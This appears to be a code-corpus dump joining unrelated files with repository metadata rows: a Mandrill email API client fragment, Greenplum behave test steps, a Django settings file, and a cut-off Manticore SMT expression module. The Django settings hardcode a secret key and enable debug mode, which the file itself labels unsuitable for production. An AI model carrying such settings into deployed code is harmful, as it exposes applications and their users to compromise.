InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('senders/domains', _params)
def add_domain(self, domain):
"""Adds a sender domain to your account. Sender domains are added automatically as you
send, but you can use this call to add them ahead of time.
Args:
domain (string): a domain name
Returns:
struct. information about the domain::
domain (string): the sender domain name
created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
spf (struct): details about the domain's SPF record::
spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill
spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
spf.error (string): an error describing the spf record, or null if the record is correct
dkim (struct): details about the domain's DKIM record::
dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill
dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
dkim.error (string): an error describing the DKIM record, or null if the record is correct
verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('senders/add-domain', _params)
def check_domain(self, domain):
"""Checks the SPF and DKIM settings for a domain. If you haven't already added this domain to your
account, it will be added automatically.
Args:
domain (string): a domain name
Returns:
struct. information about the sender domain::
domain (string): the sender domain name
created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
spf (struct): details about the domain's SPF record::
spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill
spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
spf.error (string): an error describing the spf record, or null if the record is correct
dkim (struct): details about the domain's DKIM record::
dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill
dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
dkim.error (string): an error describing the DKIM record, or null if the record is correct
verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('senders/check-domain', _params)
def verify_domain(self, domain, mailbox):
"""Sends a verification email in order to verify ownership of a domain.
Domain verification is an optional step to confirm ownership of a domain. Once a
domain has been verified in a Mandrill account, other accounts may not have their
messages signed by that domain unless they also verify the domain. This prevents
other Mandrill accounts from sending mail signed by your domain.
Args:
domain (string): a domain name at which you can receive email
mailbox (string): a mailbox at the domain where the verification email should be sent
Returns:
struct. information about the verification that was sent::
status (string): "sent" indicates that the verification has been sent, "already_verified" indicates that the domain has already been verified with your account
domain (string): the domain name you provided
email (string): the email address the verification email was sent to
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain, 'mailbox': mailbox}
return self.master.call('senders/verify-domain', _params)
def info(self, address):
"""Return more detailed information about a single sender, including aggregates of recent stats
Args:
address (string): the email address of the sender
Returns:
struct. the detailed information on the sender::
address (string): the sender's email address
created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
sent (integer): the total number of messages sent by this sender
hard_bounces (integer): the total number of hard bounces by messages by this sender
soft_bounces (integer): the total number of soft bounces by messages by this sender
rejects (integer): the total number of rejected messages by this sender
complaints (integer): the total number of spam complaints received for messages by this sender
unsubs (integer): the total number of unsubscribe requests received for messages by this sender
opens (integer): the total number of times messages by this sender have been opened
clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
stats (struct): an aggregate summary of the sender's sending stats::
stats.today (struct): stats for this sender so far today::
stats.today.sent (integer): the number of emails sent for this sender so far today
stats.today.hard_bounces (integer): the number of emails hard bounced for this sender so far today
stats.today.soft_bounces (integer): the number of emails soft bounced for this sender so far today
stats.today.rejects (integer): the number of emails rejected for sending this sender so far today
stats.today.complaints (integer): the number of spam complaints for this sender so far today
stats.today.unsubs (integer): the number of unsubscribes for this sender so far today
stats.today.opens (integer): the number of times emails have been opened for this sender so far today
stats.today.unique_opens (integer): the number of unique opens for emails sent for this sender so far today
stats.today.clicks (integer): the number of URLs that have been clicked for this sender so far today
stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this sender so far today
stats.last_7_days (struct): stats for this sender in the last 7 days::
stats.last_7_days.sent (integer): the number of emails sent for this sender in the last 7 days
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 7 days
stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 7 days
stats.last_7_days.rejects (integer): the number of emails rejected for sending this sender in the last 7 days
stats.last_7_days.complaints (integer): the number of spam complaints for this sender in the last 7 days
stats.last_7_days.unsubs (integer): the number of unsubscribes for this sender in the last 7 days
stats.last_7_days.opens (integer): the number of times emails have been opened for this sender in the last 7 days
stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 7 days
stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 7 days
stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 7 days
stats.last_30_days (struct): stats for this sender in the last 30 days::
stats.last_30_days.sent (integer): the number of emails sent for this sender in the last 30 days
stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 30 days
stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 30 days
stats.last_30_days.rejects (integer): the number of emails rejected for sending this sender in the last 30 days
stats.last_30_days.complaints (integer): the number of spam complaints for this sender in the last 30 days
stats.last_30_days.unsubs (integer): the number of unsubscribes for this sender in the last 30 days
stats.last_30_days.opens (integer): the number of times emails have been opened for this sender in the last 30 days
stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 30 days
stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 30 days
stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 30 days
stats.last_60_days (struct): stats for this sender in the last 60 days::
stats.last_60_days.sent (integer): the number of emails sent for this sender in the last 60 days
stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 60 days
stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 60 days
stats.last_60_days.rejects (integer): the number of emails rejected for sending this sender in the last 60 days
stats.last_60_days.complaints (integer): the number of spam complaints for this sender in the last 60 days
stats.last_60_days.unsubs (integer): the number of unsubscribes for this sender in the last 60 days
stats.last_60_days.opens (integer): the number of times emails have been opened for this sender in the last 60 days
stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 60 days
stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 60 days
stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 60 days
stats.last_90_days (struct): stats for this sender in the last 90 days::
stats.last_90_days.sent (integer): the number of emails sent for this sender in the last 90 days
stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 90 days
stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 90 days
stats.last_90_days.rejects (integer): the number of emails rejected for sending this sender in the last 90 days
stats.last_90_days.complaints (integer): the number of spam complaints for this sender in the last 90 days
stats.last_90_days.unsubs (integer): the number of unsubscribes for this sender in the last 90 days
stats.last_90_days.opens (integer): the number of times emails have been opened for this sender in the last 90 days
stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 90 days
stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 90 days
stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 90 days
Raises:
UnknownSenderError: The requested sender does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'address': address}
return self.master.call('senders/info', _params)
def time_series(self, address):
"""Return the recent history (hourly stats for the last 30 days) for a sender
Args:
address (string): the email address of the sender
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
UnknownSenderError: The requested sender does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'address': address}
return self.master.call('senders/time-series', _params)
class Metadata(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Get the list of custom metadata fields indexed for the account.
Returns:
array. the custom metadata fields for the account::
[] (struct): the individual custom metadata field info::
[].name (string): the unique identifier of the metadata field to update
[].state (string): the current state of the metadata field, one of "active", "delete", or "index"
[].view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('metadata/list', _params)
def add(self, name, view_template=None):
"""Add a new custom metadata field to be indexed for the account.
Args:
name (string): a unique identifier for the metadata field
view_template (string): optional Mustache template to control how the metadata is rendered in your activity log
Returns:
struct. the information saved about the new metadata field::
name (string): the unique identifier of the metadata field to update
state (string): the current state of the metadata field, one of "active", "delete", or "index"
view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
MetadataFieldLimitError: Custom metadata field limit reached.
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'view_template': view_template}
return self.master.call('metadata/add', _params)
def update(self, name, view_template):
"""Update an existing custom metadata field.
Args:
name (string): the unique identifier of the metadata field to update
view_template (string): optional Mustache template to control how the metadata is rendered in your activity log
Returns:
struct. the information for the updated metadata field::
name (string): the unique identifier of the metadata field to update
state (string): the current state of the metadata field, one of "active", "delete", or "index"
view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMetadataFieldError: The provided metadata field name does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'view_template': view_template}
return self.master.call('metadata/update', _params)
def delete(self, name):
"""Delete an existing custom metadata field. Deletion isn't instataneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete.
Args:
name (string): the unique identifier of the metadata field to update
Returns:
struct. the information for the deleted metadata field::
name (string): the unique identifier of the metadata field to update
state (string): the current state of the metadata field, one of "active", "delete", or "index"
view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMetadataFieldError: The provided metadata field name does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('metadata/delete', _params)
| gpl-2.0 | 7,916,167,334,964,486,000 | 63.208096 | 452 | 0.644558 | false | 4.67285 | false | false | false |
atris/gpdb | gpMgmt/bin/gppylib/test/behave/mgmt_utils/steps/recoverseg_mgmt_utils.py | 6 | 2601 | from gppylib.commands.base import Command, ExecutionError, REMOTE, WorkerPool
from gppylib.db import dbconn
from gppylib.gparray import GpArray
from gppylib.test.behave_utils.utils import run_gpcommand, getRows
import platform
@given('the information of a "{seg}" segment on a remote host is saved')
@when('the information of a "{seg}" segment on a remote host is saved')
@then('the information of a "{seg}" segment on a remote host is saved')
def impl(context, seg):
if seg == "mirror":
gparray = GpArray.initFromCatalog(dbconn.DbURL())
mirror_segs = [seg for seg in gparray.getDbList() if seg.isSegmentMirror() and seg.getSegmentHostName() != platform.node()]
context.remote_mirror_segdbId = mirror_segs[0].getSegmentDbId()
context.remote_mirror_segdbname = mirror_segs[0].getSegmentHostName()
context.remote_mirror_datadir = mirror_segs[0].getSegmentDataDirectory()
@given('user runs the command "{cmd}" with the saved mirror segment option')
@when('user runs the command "{cmd}" with the saved mirror segment option')
@then('user runs the command "{cmd}" with the saved mirror segment option')
def impl(context, cmd):
cmdStr = '%s -s %s' % (cmd, int(context.remote_mirror_segdbId))
cmd=Command(name='user command', cmdStr=cmdStr)
cmd.run(validateAfter=True)
@given('the saved mirror segment process is still running on that host')
@when('the saved mirror segment process is still running on that host')
@then('the saved mirror segment process is still running on that host')
def impl(context):
cmd = """ps ux | grep "/bin/postgres \-D %s " | grep -v grep""" % (context.remote_mirror_datadir)
cmd=Command(name='user command', cmdStr=cmd, ctxt=REMOTE, remoteHost=context.remote_mirror_segdbname)
cmd.run(validateAfter=True)
res = cmd.get_results()
if not res.stdout.strip():
raise Exception('Mirror segment "%s" not active on "%s"' % (context.remote_mirror_datadir, context.remote_mirror_segdbname))
@given('the saved mirror segment is marked down in config')
@when('the saved mirror segment is marked down in config')
@then('the saved mirror segment is marked down in config')
def impl(context):
qry = """select count(*) from gp_segment_configuration where status='d' and hostname='%s' and dbid=%s""" % (context.remote_mirror_segdbname, context.remote_mirror_segdbId)
row_count = getRows('template1', qry)[0][0]
if row_count != 1:
raise Exception('Expected mirror segment %s on host %s to be down, but it is running.' % (context.remote_mirror_datadir, context.remote_mirror_segdbname))
| apache-2.0 | -1,428,855,693,660,359,200 | 58.113636 | 175 | 0.720108 | false | 3.592541 | false | false | false |
kurji/lojban_website_mockup | jbobau/jbobau/settings.py | 1 | 3110 | """
Django settings for jbobau project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm#8yqn^1gq&*879+o)e#k2ixg3)_bhv(i@j53g$*ay-tu6p&h%'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'home',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jbobau.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'jbobau.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| gpl-3.0 | 7,384,730,629,264,512,000 | 24.284553 | 91 | 0.683923 | false | 3.463252 | false | false | false |
montyly/manticore | manticore/core/smtlib/expression.py | 1 | 36789 | from functools import reduce
from ...exceptions import SmtlibError
import uuid
import re
import copy
from typing import Union, Type, Optional, Dict, Any
class ExpressionException(SmtlibError):
"""
Expression exception
"""
pass
class Expression:
""" Abstract taintable Expression. """
def __init__(self, taint: Union[tuple, frozenset] = ()):
if self.__class__ is Expression:
raise TypeError
super().__init__()
self._taint = frozenset(taint)
def __repr__(self):
return "<{:s} at {:x}{:s}>".format(type(self).__name__, id(self), self.taint and "-T" or "")
@property
def is_tainted(self):
return len(self._taint) != 0
@property
def taint(self):
return self._taint
def issymbolic(value) -> bool:
"""
Helper to determine whether an object is symbolic (e.g checking
if data read from memory is symbolic)
:param object value: object to check
:return: whether `value` is symbolic
:rtype: bool
"""
return isinstance(value, Expression)
def istainted(arg, taint=None):
"""
Helper to determine whether an object if tainted.
:param arg: a value or Expression
:param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*'). If None, this function checks for any taint value.
"""
if not issymbolic(arg):
return False
if taint is None:
return len(arg.taint) != 0
for arg_taint in arg.taint:
m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE)
if m:
return True
return False
def get_taints(arg, taint=None):
"""
Helper to list an object taints.
:param arg: a value or Expression
:param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*'). If None, this function checks for any taint value.
"""
if not issymbolic(arg):
return
for arg_taint in arg.taint:
if taint is not None:
m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE)
if m:
yield arg_taint
else:
yield arg_taint
return
def taint_with(arg, *taints, value_bits=256, index_bits=256):
"""
Helper to taint a value.
:param arg: a value or Expression
:param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*'). If None, this function checks for any taint value.
"""
tainted_fset = frozenset(tuple(taints))
if not issymbolic(arg):
if isinstance(arg, int):
arg = BitVecConstant(value_bits, arg)
arg._taint = tainted_fset
else:
raise ValueError("type not supported")
else:
if isinstance(arg, BitVecVariable):
arg = arg + BitVecConstant(value_bits, 0, taint=tainted_fset)
else:
arg = copy.copy(arg)
arg._taint |= tainted_fset
return arg
class Variable(Expression):
def __init__(self, name: str, *args, **kwargs):
if self.__class__ is Variable:
raise TypeError
assert " " not in name
super().__init__(*args, **kwargs)
self._name = name
@property
def declaration(self):
pass
@property
def name(self):
return self._name
def __copy__(self, memo):
raise ExpressionException("Copying of Variables is not allowed.")
def __deepcopy__(self, memo):
raise ExpressionException("Copying of Variables is not allowed.")
def __repr__(self):
return "<{:s}({:s}) at {:x}>".format(type(self).__name__, self.name, id(self))
class Constant(Expression):
def __init__(self, value: Union[bool, int], *args, **kwargs):
if self.__class__ is Constant:
raise TypeError
super().__init__(*args, **kwargs)
self._value = value
@property
def value(self):
return self._value
class Operation(Expression):
def __init__(self, *operands, **kwargs):
if self.__class__ is Operation:
raise TypeError
# assert len(operands) > 0
# assert all(isinstance(x, Expression) for x in operands)
self._operands = operands
# If taint was not forced by a keyword argument, calculate default
if "taint" not in kwargs:
kwargs["taint"] = reduce(lambda x, y: x.union(y.taint), operands, frozenset())
super().__init__(**kwargs)
@property
def operands(self):
return self._operands
###############################################################################
# Booleans
class Bool(Expression):
def __init__(self, *operands, **kwargs):
super().__init__(*operands, **kwargs)
def cast(self, value: Union[int, bool], **kwargs) -> Union["BoolConstant", "Bool"]:
if isinstance(value, Bool):
return value
return BoolConstant(bool(value), **kwargs)
def __cmp__(self, *args):
raise NotImplementedError("CMP for Bool")
def __invert__(self):
return BoolNot(self)
def __eq__(self, other):
return BoolEqual(self, self.cast(other))
def __hash__(self):
return object.__hash__(self)
def __ne__(self, other):
return BoolNot(self == self.cast(other))
def __and__(self, other):
return BoolAnd(self, self.cast(other))
def __or__(self, other):
return BoolOr(self, self.cast(other))
def __xor__(self, other):
return BoolXor(self, self.cast(other))
def __rand__(self, other):
return BoolAnd(self.cast(other), self)
def __ror__(self, other):
return BoolOr(self.cast(other), self)
def __rxor__(self, other):
return BoolXor(self.cast(other), self)
def __bool__(self):
raise NotImplementedError("__bool__ for Bool")
class BoolVariable(Bool, Variable):
def __init__(self, name, *args, **kwargs):
super().__init__(name, *args, **kwargs)
@property
def declaration(self):
return f"(declare-fun {self.name} () Bool)"
class BoolConstant(Bool, Constant):
def __init__(self, value: bool, *args, **kwargs):
super().__init__(value, *args, **kwargs)
def __bool__(self):
return self.value
class BoolOperation(Operation, Bool):
def __init__(self, *operands, **kwargs):
super().__init__(*operands, **kwargs)
class BoolNot(BoolOperation):
def __init__(self, value, **kwargs):
super().__init__(value, **kwargs)
class BoolAnd(BoolOperation):
def __init__(self, a, b, **kwargs):
super().__init__(a, b, **kwargs)
class BoolOr(BoolOperation):
def __init__(self, a: "Bool", b: "Bool", **kwargs):
super().__init__(a, b, **kwargs)
class BoolXor(BoolOperation):
def __init__(self, a, b, **kwargs):
super().__init__(a, b, **kwargs)
class BoolITE(BoolOperation):
def __init__(self, cond: "Bool", true: "Bool", false: "Bool", **kwargs):
super().__init__(cond, true, false, **kwargs)
class BitVec(Expression):
""" This adds a bitsize to the Expression class """
def __init__(self, size, *operands, **kwargs):
super().__init__(*operands, **kwargs)
self.size = size
@property
def mask(self):
return (1 << self.size) - 1
@property
def signmask(self):
return 1 << (self.size - 1)
def cast(
self, value: Union["BitVec", str, int, bytes], **kwargs
) -> Union["BitVecConstant", "BitVec"]:
if isinstance(value, BitVec):
assert value.size == self.size
return value
if isinstance(value, (str, bytes)) and len(value) == 1:
value = ord(value)
# Try to support not Integral types that can be casted to int
if not isinstance(value, int):
value = int(value)
# FIXME? Assert it fits in the representation
return BitVecConstant(self.size, value, **kwargs)
def __add__(self, other):
return BitVecAdd(self, self.cast(other))
def __sub__(self, other):
return BitVecSub(self, self.cast(other))
def __mul__(self, other):
return BitVecMul(self, self.cast(other))
def __mod__(self, other):
return BitVecMod(self, self.cast(other))
# object.__divmod__(self, other)
# object.__pow__(self, other[, modulo])
def __lshift__(self, other):
return BitVecShiftLeft(self, self.cast(other))
def __rshift__(self, other):
return BitVecShiftRight(self, self.cast(other))
def __and__(self, other):
return BitVecAnd(self, self.cast(other))
def __xor__(self, other):
return BitVecXor(self, self.cast(other))
def __or__(self, other):
return BitVecOr(self, self.cast(other))
# The division operator (/) is implemented by these methods. The
# __truediv__() method is used when __future__.division is in effect,
# otherwise __div__() is used. If only one of these two methods is
# defined, the object will not support division in the alternate context;
# TypeError will be raised instead.
def __div__(self, other):
return BitVecDiv(self, self.cast(other))
def __truediv__(self, other):
return BitVecDiv(self, self.cast(other))
def __floordiv__(self, other):
return self / other
# These methods are called to implement the binary arithmetic operations
# (+, # -, *, /, %, divmod(), pow(), **, <<, >>, &, ^, |) with reflected
# (swapped) operands. These functions are only called if the left operand
# does not support the corresponding operation and the operands are of
# different types. [2] For instance, to evaluate the expression x - y,
# where y is an instance of a class that has an __rsub__() method,
# y.__rsub__(x) is called if x.__sub__(y) returns NotImplemented.
def __radd__(self, other):
return BitVecAdd(self.cast(other), self)
def __rsub__(self, other):
return BitVecSub(self.cast(other), self)
def __rmul__(self, other):
return BitVecMul(self.cast(other), self)
def __rmod__(self, other):
return BitVecMod(self.cast(other), self)
def __rtruediv__(self, other):
return BitVecDiv(self.cast(other), self)
def __rdiv__(self, other):
return BitVecDiv(self.cast(other), self)
# object.__rdivmod__(self, other)
# object.__rpow__(self, other)
def __rlshift__(self, other):
return BitVecShiftLeft(self.cast(other), self)
def __rrshift__(self, other):
return BitVecShiftRight(self.cast(other), self)
def __rand__(self, other):
return BitVecAnd(self.cast(other), self)
def __rxor__(self, other):
return BitVecXor(self.cast(other), self)
def __ror__(self, other):
return BitVecOr(self.cast(other), self)
def __invert__(self):
return BitVecXor(self, self.cast(self.mask))
# These are the so-called "rich comparison" methods, and are called
# for comparison operators in preference to __cmp__() below. The
# correspondence between operator symbols and method names is as
# follows:
# x<y calls x.__lt__(y),
# x<=y calls x.__le__(y),
# x==y calls x.__eq__(y),
# x!=y and x<>y call x.__ne__(y),
# x>y calls x.__gt__(y), and
# x>=y calls x.__ge__(y).
def __lt__(self, other):
return LessThan(self, self.cast(other))
def __le__(self, other):
return LessOrEqual(self, self.cast(other))
def __eq__(self, other):
return BoolEqual(self, self.cast(other))
def __hash__(self):
return object.__hash__(self)
def __ne__(self, other):
return BoolNot(BoolEqual(self, self.cast(other)))
def __gt__(self, other):
return GreaterThan(self, self.cast(other))
def __ge__(self, other):
return GreaterOrEqual(self, self.cast(other))
def __neg__(self):
return BitVecNeg(self)
# Unsigned comparisons
def ugt(self, other):
return UnsignedGreaterThan(self, self.cast(other))
def uge(self, other):
return UnsignedGreaterOrEqual(self, self.cast(other))
def ult(self, other):
return UnsignedLessThan(self, self.cast(other))
def ule(self, other):
return UnsignedLessOrEqual(self, self.cast(other))
def udiv(self, other):
return BitVecUnsignedDiv(self, self.cast(other))
def rudiv(self, other):
return BitVecUnsignedDiv(self.cast(other), self)
def sdiv(self, other):
return BitVecDiv(self, self.cast(other))
def rsdiv(self, other):
return BitVecDiv(self.cast(other), self)
def srem(self, other):
return BitVecRem(self, self.cast(other))
def rsrem(self, other):
return BitVecRem(self.cast(other), self)
def urem(self, other):
return BitVecUnsignedRem(self, self.cast(other))
def rurem(self, other):
return BitVecUnsignedRem(self.cast(other), self)
def sar(self, other):
return BitVecArithmeticShiftRight(self, self.cast(other))
def sal(self, other):
return BitVecArithmeticShiftLeft(self, self.cast(other))
def Bool(self):
return self != 0
class BitVecVariable(BitVec, Variable):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@property
def declaration(self):
return f"(declare-fun {self.name} () (_ BitVec {self.size}))"
class BitVecConstant(BitVec, Constant):
def __init__(self, size: int, value: int, *args, **kwargs):
super().__init__(size, value, *args, **kwargs)
def __bool__(self):
return self.value != 0
def __eq__(self, other):
if self.taint:
return super().__eq__(other)
return self.value == other
def __hash__(self):
return super().__hash__()
class BitVecOperation(BitVec, Operation):
def __init__(self, size, *operands, **kwargs):
super().__init__(size, *operands, **kwargs)
class BitVecAdd(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecSub(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecMul(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecDiv(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecUnsignedDiv(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecMod(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecRem(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecUnsignedRem(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecShiftLeft(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecShiftRight(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecArithmeticShiftLeft(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecArithmeticShiftRight(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecAnd(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecOr(BitVecOperation):
def __init__(self, a: BitVec, b: BitVec, *args, **kwargs):
assert a.size == b.size
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecXor(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecNot(BitVecOperation):
def __init__(self, a, **kwargs):
super().__init__(a.size, a, **kwargs)
class BitVecNeg(BitVecOperation):
def __init__(self, a, *args, **kwargs):
super().__init__(a.size, a, *args, **kwargs)
# Comparing two bitvectors results in a Bool
class LessThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a, b, *args, **kwargs)
class LessOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a, b, *args, **kwargs)
class BoolEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
